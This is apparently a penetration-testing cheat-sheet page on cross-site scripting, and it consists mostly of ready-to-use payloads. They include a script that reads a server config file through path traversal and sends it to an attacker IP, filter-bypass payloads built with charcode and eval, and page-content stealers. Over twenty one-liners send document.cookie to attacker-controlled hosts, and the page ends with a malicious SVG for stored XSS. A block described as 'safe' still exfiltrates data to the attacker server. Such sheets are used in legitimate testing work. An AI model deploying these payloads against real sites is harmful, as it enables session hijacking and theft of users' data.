XSS

Cross-site Scripting

Methodology

Reflected XSS

XSS + Arbitrary File Upload

  • First, create the file that you are going to use to load the malicious javascript:

Load the file
<script src="http://REMOTE-SERVER:PORT/tokyo.js"></script>

  • Then, create the script:

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.5:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Test Filters

External Requests

  • Test if the web application allows the inclusion of resources from external servers:

    1. Spawn a HTTP server python3 -m http.server 80

    2. Submit the payload and wait for the request <img src='http://10.10.14.30/test.jpg' />

Code Execution

<script>alert('XSS')</script>
<img src="x` `<script>javascript:alert(1)</script>"` `>

Charcode Bypass

  • First use python to convert the payload to integers:

python3 -c "print(','.join([str(ord(c)) for c in '''document.write('<script src=\"http://10.10.16.8/tokyo.js\"></script>');''']))"

  • Now make the payload:

<img src="x/><script>eval(String.fromCharCode(CHARCODE_HERE));</script>">

  • If you get a respond on the server you can try to steal data by creating the malicious files.

Stealers

Reflected XSS

  • Capture the Full HTML content of a web page:

var req=new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + btoa(document.body.innerHTML), true);
req.send();

  • Once the full content is captured you can target a specific element or section of the page:

function getElement() {
	var req1=new XMLHttpRequest(); 
	req1.open('GET', '#admin' , true); //Swap #admin for your desired element
	req1.onreadystatechange = function () { 
		if (req1.readyState === req1.DONE) {
			if (req1.status === 200) { 
				 var req2=new XMLHttpRequest(); 
				req2.open('GET', 'http://10.10.16.8:4444?tokyo=' + btoa(req1.responseText), true);
				req2.send(); 
				}
			}
		}; 
	req1.send();
}

getElement();

  • You can also steals cookies that may been stored in the DOM:

window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})

  • In this code, safeContentGrab safely fetches & encodes content, cookieExample shows correct cookie access; contrast with direct XSS payload execution in CTF scenarios.

function safeContentGrab() {
    var req = new XMLHttpRequest();
    req.open('GET', 'http://example.com', true);
    req.onload = function() {
        if (req.status === 200) {
            var encodedData = btoa(req.responseText);
            console.log('Encoded:', encodedData);
             var sendReq = new XMLHttpRequest();
             sendReq.open('POST', 'http://10.10.16.8:4444/', true);
             sendReq.send('tokyo=' + encodedData);
        }
    };
    req.send();
}

function cookieExample() {
    document.cookie = "testCookie=exampleValue; SameSite=Lax";
    var allCookies = document.cookie;
    console.log('All cookies:', allCookies);
}

safeContentGrab();
cookieExample();

Stealing Cookies

Key Condition -> HttpOnly needs to be set to false

  • Use when injecting into an image tag where an error event triggers(HTTP response error or broken link):

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>

  • Use when you can inject an image and trigger a redirect via the onerror event(load error):

<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">

  • Use in situations where you can send cookies via an image request (URL encoding):

<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>

  • Use when you need to send cookies using an audio object:

<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>

  • Use when you want to redirect the user to a server with the cookies attached:

<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Similar to the previous one; use when you want to redirect:

<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Use in scenarios where you can modify the document.location and send cookies:

<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Inject when you need to send cookies via document.location.href and trigger a redirect:

<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Use to dynamically write an image that sends cookies:

<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>

  • Use when you need to assign a location redirect with cookies:

<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Similar to the previous one, use when you need to access window.location properties dynamically:

<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Use when you need to modify window.location.href dynamically:

<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Use when you can dynamically join the URL and cookies to redirect:

<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>

  • Use when you can send cookies using an image object:

<script>var i=new Image(); i.src="http://10.10.14.6/?c="+document.cookie;</script>

  • Use when you need to redirect with concatenation of cookies into a URL:

<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>

  • Use in scenarios where you can send cookies via an XMLHttpRequest:

<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>

  • Use when you can inject base64-encoded JavaScript and execute it to send cookies:

<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>

  • Use when you need to send cookies via fetch with no-cors mode to avoid response handling:

<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>

  • Use when you want to send cookies asynchronously in the background using the sendBeacon API, typically for stealthier attacks.

<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

Stored XSS

  • Create a malicious SVG file to test image uploading features:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("Hello World");
  </script>
</svg>
PreviousLFINextJava-based web application

Last updated